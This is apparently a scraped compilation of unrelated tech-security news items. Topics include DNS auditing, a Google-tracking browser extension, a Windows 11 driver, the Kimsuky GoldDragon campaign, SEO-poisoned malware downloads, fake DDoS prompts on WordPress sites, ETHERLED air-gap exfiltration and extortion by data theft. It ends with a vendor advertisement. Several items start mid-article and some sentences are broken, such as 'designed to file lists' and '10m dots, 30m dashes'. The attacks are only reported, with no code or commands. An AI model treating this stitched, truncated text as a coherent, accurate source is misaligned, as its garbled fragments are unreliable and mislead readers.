It is crucial for every business to understand how their domain names are being used. Many will be utilized in a way to generate revenue, increase perception and reputation, or support critical infrastructure. But it may not always be apparent to internal stakeholders that a domain is no longer resolving to the correct website, or even at all. 

DNS Traffic Analysis, for example, is a great way to ensure that every domain redirects to where it should, highlighting anomalies that can be quickly corrected and aligned with the domain name policy. 

Analyzing the data will also highlight those high-traffic domain names which may need enhanced functionality, prioritization, and security management. It is worth identifying these key domains and evaluating the use of registry level locking, email security records, and DNSSEC.

While the priority of DNS is to ensure that domain names are directed to the correct web content, enterprise providers will also offer proactive threat monitoring and intelligence that keeps the most critical domain names present and protected. Having robust security policies that encompass the use, and protection, of domain names as key digital assets is critical as major DNS outages or security incidents are now headline news for all the wrong reasons. 

These types of events damage not only revenue but the reputations of organisations. This is why choosing an enterprise DNS partner which has a globally distributed network of DNS nodes is key. Using enterprise-grade DNS ensures that critical domain names that support websites, online applications and email addresses continue to function, even if there is a DDoS attack on the network. 

DNS services come in all shapes and forms. At their heart they ensure domain names direct to where they should. The key test comes when the network is put under stress, either by an increase in legitimate traffic or by nefarious sources. For many organizations, the question is can they afford to risk their domain names ceasing to function due to the limitations of their DNS network. 

Auditing DNS on a regular basis is now considered best practice. Working with a domain security expert will provide you with forensic analysis and trusted recommendations to ensure domain names are adding to revenue and reputations rather than headaches and security concerns.

Source

The browser extension makes a beep (more of a sound classic modems made when data was transferred) whenever a connection to Google is established to transfer data to the company. It may begin even before a website is loaded, if Google is the default search provider. Then, beeps may occur when a site is loaded, after a site has been loaded, or when site elements are moved over or selected.

To use the extension , simply install it in Firefox, Chrome or compatible browsers, and visit sites like you normally do.

Note: I could not find the extension in the Chrome Web Store. I tried various searches and it did not come up. Hubert confirmed that it is available for Chrome as well.

Whenever a site or the browser makes a connection to Google to send data packets to the company, the extension is giving you an audio-cue; this happens when you type in the address or search bar, on page load, when you move the mouse over elements on a webpage, and also after the initial site load in the browser. Some sites refresh advertisement in intervals, which usually means new connections to advertising servers on the Internet.

Most of the time, when you hear a beep while moving the mouse over an element on the site, it is a connection to Google Analytics that is established. Many sites use Google Analytics to track website visits, how a website is used, and website errors.

Hubert notes that Google Cloud users are excluded by the extension, but that other connections to major Google sites and servers are covered by the browser extension. IP addresses were taken from an official Google support page listing them,

A visit to YouTube, one of Google's main properties, creates a near endless stream of audio cues. Testing the extension on Google's own sites may be a bit unfair, but most sites that you visit during regular browsing sessions submit data to Google in one way or another.

The extension does not reveal which data is submitted. Not all connections are necessary tracking related, but with each, Google gets information about the user and browser/site the connection originated from.

Some sites become unusable when the extension is enabled; this is the case for YouTube, which connects to Google servers constantly. The extension has no option to exclude certain properties, which would help with that.

Closing Words

Google Teller is a smart extension that may be used as a wake up call for Internet users. The extension could be extended with Facebook, Amazon and Microsoft servers to highlight the involvement of these companies on the Internet.

It is in need of an exceptions list and maybe a toggle to turn it on or off easily.

Now You: What is your take on Google Teller?

Google Teller: browser makes a noise whenever Google gets data

Earlier today, Microsoft released multiple Windows 11 Insider builds, two on the Beta Channel (KB5016701) and one for the Dev. The new Dev Channel build 25188 brings many new features and improvements that Microsoft has outlined in the changelog for the build.

And although not mentioned there, it looks like the company may have made some enhancements to the Windows 11 security. Spotted by Twitter user and leakster Xeno, a new updated driver for Microsoft Security Core Boot (msseccore.sys) is present inside. The updated driver comes with version number 10.0.25188.1000 clearly indicating that it was updated with the latest build.

Although we cannot confirm what kind of changes have been made within the driver, it is possible that some of the many recent UEFI and Secure Boot vulnerabilities that surfaced has prompted Microsoft to act so as to harden the boot process further.

Back in February, firmware from Microsoft, Intel, and more companies were found vulnerable to nearly two dozen threats. Later in April, several Lenovo notebook models were affected by a security issue that allowed threat actors to alter Secure Boot settings. And most recently, systems were found susceptible to GRUB BootHole flaw, though Microsoft has already patched the issue with its KB5012170 update.

The company had also promised better performance on Windows 11 in 2022 so this can be a part of that effort too.

Source and image: Xeno (Twitter)

Build 25188 driver suggests Microsoft may be improving Windows 11 security

The study measured how many data points each company collects from its users. The study found that Google topped the list, collecting a total of 39 data points for each of its users. Twitter and Amazon follow by collecting 24 and 23 data points for each user, respectively.

Possibly surprising to some, Facebook, known to be in favor of user tracking, comes close to Apple by only collecting 14 data points for each user. Apple is at the bottom of the list and only collects 12 data points for each user, according to the study. Apple, unlike Google, relies much more heavily on on-device machine learning and algorithms to dictate personalization features, such as personalized music recommendations for Apple Music and curated photos in Photos.

While Apple collects the least amount of user data from its users, it's making it harder for other companies, such as Google and Facebook, to collect data from ‌iPhone‌ users. In 2020, Apple launched App Tracking Transparency (ATT), a prompt that offers users the choice of whether they wish to be tracked across apps and websites owned by other companies. Facebook has vehemently spoken out against ATT, and details last year revealed the prompt change could have cost social media companies $10 billion in revenue for 2021.

Source

Russian cybersecurity firm Kaspersky codenamed the cluster GoldDragon, with the infection chains leading to the deployment of Windows malware designed to file lists, user keystrokes, and stored web browser login credentials.

Included among the potential victims are South Korean university professors, think tank researchers, and government officials.

Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, is the name given to a prolific North Korean advanced persistent threat (APT) group that targets entities globally, but with a primary focus on South Korea, to gain intelligence on various topics of interest to the regime.

Known to be operating since 2012, the group has a history of employing social engineering tactics, spear-phishing, and watering hole attacks to exfiltrate desired information from victims.

Late last month, cybersecurity firm Volexity attributed the actor to an intelligence gathering mission designed to siphon email content from Gmail and AOL via a malicious Chrome browser extension dubbed Sharpext.

The latest campaign follows a similar modus operandi wherein the attack sequence is initiated via spear-phishing messages containing macro-embedded Microsoft Word documents that purportedly feature content related to geopolitical issues in the region.

Alternative initial access routes are also said to take advantage of HTML Application (HTA) and Compiled HTML Help (CHM) files as decoys to compromise the system.

Regardless of the method used, the initial access is followed by dropping a Visual Basic Script from a remote server that's orchestrated to fingerprint the machine and retrieve additional payloads, including an executable capable of exfiltrating sensitive information.

What's novel about the attack is the transmission of the victim's email address to the command-and-control (C2) server should the recipient click a link in the email to download additional documents. If the request doesn't contain an expected email address, a benign document is returned.

To further complicate the kill chain, the first-stage C2 server forwards the victim's IP address to another VBS server, which then compares it with an incoming request that's generated after the target opens the lure document.

The "victim verification methodology" in the two C2 servers ensures that the VBScript is delivered only when the IP address checks are successful, indicating a highly targeted approach.

"The Kimsuky group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis," Kaspersky researcher Seongsu Park said. "The main difficulty in tracking this group is that it's tough to acquire a full-infection chain."

Source

Experts from Zscaler recently analyzed several ongoing malware distribution campaigns, finding an unknown threat actor (or multiple actors) is using SEO poisoning techniques to have their websites appear high up on Google results pages for popular software-related queries such as Adobe Acrobat Pro, 7-Data Recovery Suite, and several other programs.

These websites, most often on .com domains, but also appearing on less popular domains such as .xyz, or .cfd, claim to be hosting these programs (and others), as well as cracks, activators, or anything else that’s needed in order to get a commercial (and expensive) program to work - for free.

RedLine Stealer or RecordBreaker

What the victims would actually be downloading onto their endpoints, however, are not the programs in question, but rather dangerous infostealing malware, such as RedLine Stealer, or RecordBreaker. These types of malware are capable of all kinds of nasties, from stealing passwords stored in browsers to stealing payment data, to grabbing screenshots.

The best way to protect against these attacks, the researchers are saying, is to refrain from downloading pirated software in the first place, as well as any cracks, keygens, activators, or anything of the sort.

Furthermore, users can protect their endpoints by installing an antivirus or a malware protection service, as well as a firewall. Finally, setting up two-factor authentication on as many accounts as possible will prevent threat actors from compromising the accounts, even if they manage to obtain the login credentials.

Also, it is important to note that just because a website pops up high on Google’s search engine results page (or any other search engine’s, for that matter), that doesn’t mean that it’s legitimate and that users should trust it by default.

Source

According to Avast, ransomware attacks declined during Q4’21 and Q1’22, but began rising again in the second quarter this year. Specifically, the Ransomware Shield safeguards files and folders from being modified, deleted, or encrypted by unknown applications. Admins will be able to choose which applications have permission to access files, preventing ransomware programs from causing havoc.

Commenting on the new Ransomware Shield, Filip Hlinka, VP of Product, Avast Business, said:

 “Small businesses are facing a growing threat from ransomware, with cybercriminals increasingly targeting smaller organizations to encrypt crucial business data and disrupt operations. The results can be devastating for small businesses that lack the financial and technical resources to rebound from such attacks. Avast's antivirus has always offered consumers and business users powerful protection against cyberthreats including ransomware, and Ransomware Shield offers a purpose-built, additional layer of protection which helps to secure businesses' most crucial files against these highly damaging attacks.”

With Avast, businesses already had some protection against ransomware with a comprehensive set of tools including Web Shield, File Shield, and Behavior Shield. The new Ransomware Shield will complement these to strengthen security. The feature is now enabled by default, and the list of protected files and folders can be edited in the Avast Business Hub.

Source

"A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week.

Distributed denial-of-service (DDoS) protection pages are essential browser verification checks designed to deter bot-driven unwanted and malicious traffic from eating up bandwidth and taking down websites.

The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file ("security_install.iso") to the victim's systems.

This is achieved by injecting three lines of code into a JavaScript file ("jquery.min.js"), or alternatively into the active theme file of the website, which, in turn, loads heavily obfuscated JavaScript from a remote server.

"This JavaScript then communicates with a second malicious domain which loads more JavaScript that initiates the download prompt for the malicious .iso file," Martin explained.

Following the download, users are prompted to enter a verification code generated from the so-called "DDoS Guard" application so as to entice the victim into opening the weaponized installer file and accessing the destination website.

While the installer does display a verification code to maintain the ruse, in reality, the file is a remote access trojan called NetSupport RAT, which is linked to the FakeUpdates (aka SocGholish) malware family and also covertly installs Raccoon Stealer, a credential-stealing trojan available for rent on underground forums.

The development is a sign that attackers are opportunistically co-opting these familiar security mechanisms in their own campaigns in a bid to trick unsuspecting website visitors into installing malware.

To mitigate such threats, website owners are required to place their sites behind a firewall, employ file integrity checks, and enforce two-factor authentication (2FA). Website visitors are also urged to turn on 2FA, avoid opening suspicious files, and use a script blocker in web browsers to prevent the execution of JavaScript.

"The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious 'slave' network, extort the computer owner, and violate their privacy — all depending on what the attackers decide to do with the compromised device," Martin said.

This isn't the first time ISO-themed files and CAPTCHA checks have been used to deliver the NetSupport RAT.

In April 2022, eSentire disclosed an attack chain that leveraged a fake Chrome installer to deploy the trojan, which then paved the way for the execution of Mars Stealer. Likewise, an IRS-themed phishing campaign detailed by Cofense and Walmart Global Tech involved utilizing fake CAPTCHA puzzles on websites to deliver the same malware.

Source

Capturing the signals requires a camera with a direct line of sight to LED lights on the air-gapped computer's card. These can be translated into binary data to steal information.

Air-gapped systems are computers typically found in highly-sensitive environments (e.g. critical infrastructure, weapon control units) that are isolated from the public internet for security reasons.

However, these systems work in air-gapped networks and still use a network card. If an intruder infects them with specially crafted malware, they could replace the card driver with a version that modifies the LED color and blinking frequency to send waves of encoded data, Mordechai Guri has found.

The ETHERLED method can work with other peripherals or hardware that use LEDs as status or operational indicators like routers, network-attached storage (NAS) devices, printers, scanners, and various other connected devices.

Compared to previously disclosed data exfiltration methods based on optical emanation that take control of LEDs in keyboards and modems, ETHERLED is a more covert approach and less likely to raise suspicion.

ETHERLED details

The attack begins with planting on the target computer malware that contains a modified version of the firmware for the network card. This allows taking control of the LED blinking frequency, duration, and color.

Alternatively, the malware can directly attack the drive for the network interface controller (NIC) to change connectivity status or to modulate the LEDs required for generating the signals.

The researcher found that the malicious driver can exploit documented or undocumented hardware functionality to fiddle with network connection speeds and to enable or disable the Ethernet interface, resulting in light blinks and color changes.

Guri's tests show that each data frame begins with a sequence of '1010', to mark the start of the package, followed by a payload of 64 bits.

For data exfiltration through single status LEDs, Morse code dots and dashes lasting between 100 ms and 300 ms were generated, separated by indicator deactivation spaces between 100 ms and 700 ms.

The bitrate of the Morse code can be increased by up to ten times (10m dots, 30m dashes, and 10-70ms spaces) when using the driver/firmware attack method.

To capture the signals remotely, threat actors can use anything from smartphone cameras (up to 30 meters), drones (up to 50m), hacked webcams (10m), hacked surveillance cameras (30m), and telescopes or cameras with  telephoto or superzoom lenses (over 100 meters).

The time needed to leak secrets such as passwords through ETHERLED ranges between 1 second and 1.5 minutes, depending on the attack method used, 2.5 sec to 4.2 minutes for private Bitcoin keys, and 42 seconds to an hour for 4096-bit RSA keys.

Other exfiltration channels

Mordechai also published a paper on 'GAIROSCOPE', an attack on air-gapped systems relying on the generation of resonance frequencies on the target system, captured by a nearby (up to 6 meters) smartphone's gyroscope sensor.

In July, the same researcher presented the 'SATAn' attack, which uses SATA cables inside computers as antennas, generating data-carrying electromagnetic waves that can be captured by nearby (up to 1.2 meters) laptops.

The complete collection of Dr. Mordechai Guri's air-gap covert channel methods can be found in a dedicated section on the Ben-Gurion University of the Negev website.

ETHERLED: Air-gapped systems leak data via network card LEDs

Think about bad security policies, untested backups, patch management practices not up-to-par, and so forth. It resulted in easy growth for ransomware extortion, a crime that multiple threat actors around the world perpetrate.

Something's changed, though. Crypto valuations have dropped, reducing the monetary appeal of ransomware attacks due to organizations mounting a formidable defense against ransomware.

Threat actors have been searching for another opportunity – and found one. It's called data exfiltration, or exfil, a type of espionage causing headaches at organizations worldwide. Let's take a look.

The threat to reveal confidential information

Information exfiltration is rapidly becoming more prevalent. Earlier this year, incidents at Nvidia, Microsoft, and several other companies have highlighted how big of a problem it's become – and how, for some organizations, it may be a threat that's even bigger than ransomware.

Nvidia, for example, became entangled in a complex tit-for-tat exchange with hacker group Lapsus$. One of the biggest chipmakers in the world was faced with the public exposure of the source code for invaluable technology, as Lapsus$ leaked the source code for the company's Deep Learning Super Sampling (DLSS) research.

When it comes to exfil extortion, attackers do not enter with the primary aim of encrypting a system and causing disruption the way that a ransomware attacker does. Though, yes, attackers may still use encryption to cover their tracks.

Instead, attackers on an information exfiltration mission will move vast amounts of proprietary data to systems that they control. And here's the game: attackers will proceed to extort the victim, threatening to release that confidential information into the wild or to sell it to unscrupulous third parties.

Exfil can be far more damaging than ransomware

For victims, it's a serious threat because threat actors can acquire the keys to the safe. Competitors can use trade secrets to produce copies of products or aid in their R&D efforts or information that could lead to a costly public relations disaster.

Either way – public exposure of information can be a threat greater than ransomware because ransomware demand can be resolved by paying up (or by retrieving backups). Leaked information – well – that's something that may be unfixable. It's easy to see why threat actors can find extortion based on information leakage to be an even more attractive target than mere ransomware.

It's worth noting that part of the drive for this type of attack also lies in the current state of world affairs which have created a strong demand for intellectual property transfer across opposing geopolitical lines. There's also arguably greater leniency against actors attacking "the other side," even when local judicial systems consider the attack a crime.

In for the long haul

There's another theme that's emerging in the exfil space. It's interesting to note something that cybersecurity teams have known for a long time: for malicious actors, it's beneficial for an attacker to stay undetected for an extended period of time.

Staying quietly, rather than flashing "you've been hacked" messages on computer screens, allows attackers to "see" more information flows in the network and to do more in-depth reconnaissance of systems after gaining entry.

More time in the network means attackers can identify more desirable targets than just a simple ransomware deployment. Patient threat actors could do far more harm; if they remain undetected.

Protective measures still work

What can organizations do to guard against extortion? Well, the same cybersecurity principles continue to count, even more so given the greater risk.

After so many years of alarming headlines, most organizations have deployed ransomware protection in the form of better backup strategies, more fine-tuned and granular data access, and better rules and monitoring for detecting unwanted file changes.

It's made ransomware attacks harder, often acting as a deterrent against attackers simply looking for easy targets. Protecting against malware infections or information exfiltration starts with properly maintaining infrastructure.

Seamless patching remains at the core

That includes keeping systems up to date with the latest patches. It's not just a guard against ransomware, of course: patched systems also close the easy paths to critical business information so that threat actors are not in a position to siphon off critical business information.

Suppose your organization is still relying on patching operations that involve maintenance windows. In that case, it's worth considering whether patching is happening fast enough to protect your organization against information exfiltration threats.

Can't patch fast enough? Take a look at live patching. TuxCare's KernelCare Enterprise helps you stay protected against emerging threats immediately, with little lag between threat emergence and mitigation. With one simple, affordable addition to your cybersecurity arsenal, you can put in place the simplest and most important line of defense against attackers looking to hold you for ransom.

Source